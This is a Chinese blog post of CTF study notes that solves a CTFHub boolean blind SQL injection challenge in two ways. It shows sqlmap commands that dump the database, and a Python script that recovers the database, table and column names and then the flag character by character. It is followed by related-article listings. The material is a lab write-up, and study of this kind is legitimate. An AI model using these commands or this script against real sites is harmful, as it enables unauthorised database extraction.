CTF技能树笔记之WEB-SQL注入:布尔盲注

最新推荐文章于 2024-05-16 02:47:32 发布
最新推荐文章于 2024-05-16 02:47:32 发布
阅读量2.7k 收藏 3
点赞数 1
分类专栏: CTF SQL注入 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123908412
版权

小白一个,如有错误请指正!

一、布尔注入

盲注有三种解法:

1.sqlmap

2.python脚本

3.手注

这里我就用sqlmap和脚本(手注真的会累死人的有木有?)

解法一:sqlmap

我们只需要按步骤来就可以了

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli --tables

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag --columns

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag -C flag --dump

解法二:使用脚本

1.自己比较菜,写的脚本还有点小问题,只能刚好爆出flag

import requests
import time

def database_name():
    count = 0
    database_name = ''
    for i in range(1, 7):
        url_data_length = url + f'1 and length(database())>{i}'
        res = requests.get(url_data_length)
        count = count + 1
        if mark_false in res.text:
            for k in range(1, count+1):
                for j in dict_name:
                    url_data_name = url + f'1 and substr(database(),{k},1)=\'{j}\''
                    # print(url_data_name)
                    res = requests.get(url_data_name)
                    if mark_true in res.text:
                        database_name = database_name + j
            print('数据库名:' + database_name)
            return database_name
            break

def database_tables(database_name):
    tables_name = []
    for table_number in range(0, 2):
        table_name = ''
        for k in range(0, 5):
            for word in dict_name:
                url_table = url + f'1 and substr((select table_name from information_schema.tables where table_schema= \'{database_name}\' limit {table_number},1),{k},1)=\'{word}\''
                # print(payload_3)
                res = requests.get(url_table)
                if mark_true in res.text:
                    table_name = table_name + word
        if table_name != '':
            print('表名:' + table_name)
            tables_name.append(table_name)
    return tables_name

def column_name(tables_name):
    columns_name = []
    for table_name in tables_name:
        # print(table_name)
        for column_number in range(0, 2):
            column_name = ''
            for k in range(0, 5):
                for word in dict_name:
                    url_column = url + f'1 and substr((select column_name from information_schema.columns where table_name= \'{table_name}\' limit {column_number},1),{k},1)=\'{word}\''
                    # print(payload_3)
                    res = requests.get(url_column)
                    if mark_true in res.text:
                        column_name = column_name + word
            if column_name != '':
                print(f'{table_name}表字段名:' + column_name)
                columns_name.append([table_name, column_name])
    return columns_name

def flag_data(columns_name):
    # print(columns_name)
    for column_name in columns_name:
        flag = ''
        for column_number in range(0, 3):
            for flag_number in range(0, 40):
                for word in dict_flag:
                    # print(column_name[0], column_name[1])
                    url_flag = url + f'1 and substr((select {column_name[1]} from {column_name[0]} ),{flag_number},1)=\'{word}\''
                    # print(url_flag)
                    res = requests.get(url_flag)
                    if mark_true in res.text:
                        flag = flag + word
            print(column_name[1] + ':' + flag)
            # break

if __name__ == '__main__':
    start = time.time()
    url = 'http://challenge-4628615c0a2a2d50.sandbox.ctfhub.com:10800/?id='
    mark_true = 'query_success'
    mark_false = 'query_error'
    dict_name = 'qwertyuiopasdfghjklzxcvbnm'
    dict_flag = 'qwertyuiopasdfghjklzxcvbnm{}1234567890'
    database_name = database_name()
    tables_name = database_tables(database_name)
    columns_name = column_name(tables_name)
    flag = flag_data(columns_name)
    end = time.time()
    print('运行时间为:', (end - start))

后续更新~ 

weixin_48799157
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
通过"CTF-Web-Challenge",你可以通过实际的场景来学习这些概念,提高在Web安全领域的技能。挑战可能包括编写代码、解密信息、寻找隐藏的文件或漏洞等。完成这些挑战将加深你对PHP和Web安全的理解,并使你能够更好地...
CTFHub_技能树_WebSQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写
Ho1aAs‘s Blog
11-19 7503
文章目录前言盲注思路盲注原理盲注常用函数完 前言 布尔盲注,与普通注的区别在于“盲注”。在注语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注就是穷举试错,由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错 盲注思路 由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下: 爆数据库名长度 根据库名长度爆数据库名 对当前数据库爆数据表数量 根据表数量爆数据表名长度 根据表名长度爆数据表名 对所有数据表爆列数量 根据列数量爆列名长度 根据列
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84968222的博客
05-16 789
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
CTFhub布尔盲注脚本
qq_41565526的博客
02-04 517
CTFhub布尔盲注脚本
CTFHub-web(sql布尔盲注)
分享与记录
07-22 4179
文章目录手工注sqlmap注总结 手工注 1. 题目直接说明了是布尔盲注,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
CTFHub | 布尔盲注
尼泊罗河伯的博客
10-29 1770
根据网页显示内容输1进行测试,此题可能存在 SQL 注。构造 payload 验证是否属于整数型注,确定此题为整数型注。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFHUB-布尔盲注
Web学习之路
03-24 1006
true 与 false
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
CTFHUBWEB) 布尔
qq_54929891的博客
09-21 1267
麻烦的来了诶,装作不知道是布尔,依然按照题目意思输1看看 从这里可以知道我们不需要打引号 哦对了,我们先应该判断是否有注点,利用真假语句来判断id的值是否可以改变sql语句的变化 通过恒真语句and 1=1和恒假语句and 1=2得知id的值可以改变sql语句的走向,说明这里存在注点,然后便上网查询一下布尔应该要用到哪些函数语句 length()返回长度 这里弊端就是因为都是ctfhub上面的题,只是注方式改变,数据库名啥的没变,所以只是为了让我们动手用这种方法..
CTFHUB-WEB-SQL注入-布尔盲注
weixin_43486981的博客
08-10 1463
知识点: Burp suite爆破模块intruder的设置: Positions设置 attack type:攻击模式设置 sniper:对变量依次进行破解。多个标记依次进行。单参数爆破,多参数时同一个字典按顺序替换各参数,总之初始值有一个参数不变。 battering ram:对变量同时进行破解。多个标记同时进行。多参数同时爆破,但用的是同一个字典。 pitchfork:每一个变量标记对应一个字典,取每个字典的对应项。 多参数同时爆破,但用的是不同的字典。 cluster bomb:每个变量对应一个字
ctfhub 布尔盲注|为什么你的sqlmap无法盲注
tempulcc的博客
10-15 2204
经常会遇到这种情况,我们手工测试注的时候,可以检测存在盲注,丢给sqlmap跑就怎么也出不来。 下面我以ctfhub技能树中的sql注入布尔盲注)为例,进行讲解。 常用的sqlmap命令: python sqlmap.py -u "http://challenge-b076bdb9af854164.sandbox.ctfhub.com:10080/?id=1" --batch --technique=B sqlmap提示说提高下等级吧,命令如下 python sqlmap.py -u "http:
CTFHub技能树web(持续更新)--SQL注入--布尔盲注
jiuyongpinyin的博客
08-14 1040
布尔盲注 这道题如果使用盲注的话,会很费劲。首先,这道题是基于真假的盲注,所以我们需要将他的每一个字母转换为ascii码,然后通过回显进行判断: 我们通过这个判断了数据库的第一个字母是 > a 的,也就是在a的后面,这样逐个爆破很麻烦,所以我们直接用工具sqlmap,首先爆破数据库: 得到数据库,接着我们爆破表: 得到两个列,我们查看flag这个表里面的列: 得到flag这个列,接着我们查看字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指
CTF整理】CTFhub技能树-Web-SQL注入
SunnyCat
05-10 2083
CTF整理】CTFhub技能树-Web-SQL注入 目录【CTF整理】CTFhub技能树-Web-SQL注入SQL整数型注SQL字符型注SQL报错注SQL布尔型注SQL时间注MySQL结构Cookie注UA注Referer注 SQL整数型注 确定闭合方式 :1 确定报错位有2个,(我选2注点) 得到库名 得到表名 得到列名 得到flag SQL字符型注 确定闭合方式:1’ 【步骤和整形一样,不再使用,我这里采用sqlmap】 核心语法: sqlmap -u "url+参
墨者学院布尔盲注(超详细手工和工具)
qq_43355651的博客
09-15 4035
墨者学院的在线靶场中sql注入漏洞测试(布尔盲注),因为不管是时间盲注还是布尔盲注手工的话都需要大量的经历和时间来完成,正好自己最近在学习sql注入盲注,就决定用手工做一次盲注的测试,以便于对sql注入更深刻的理解 温馨提示:此文章基于专门实验的平台下测试,任何人不得随意测试或者注,互联网不是法外之地,任何除学习之外的事情与作者无关。 首先我们打开墨者学院在线靶场中的sql注入漏洞测试(布尔盲注) 然后找到滚动的字段打开链接寻找注点 通过测试 and 1=1 and 1=2 之后发现存在注
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入布尔盲注
m0_73734159的博客
12-09 945
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注是否成功。布尔是一种常见的SQL注入攻击技术,攻击者通过构造恶意输,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔盲注
ctfhub布尔盲注
08-31
CTF比赛中,也经常会涉及到布尔盲注的题目。 布尔盲注是通过构造恶意的输来判断应用程序是否存在漏洞。它的原理是利用应用程序对输的处理方式,通过观察应用程序在不同输情况下的响应,来推断出隐藏在后台...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值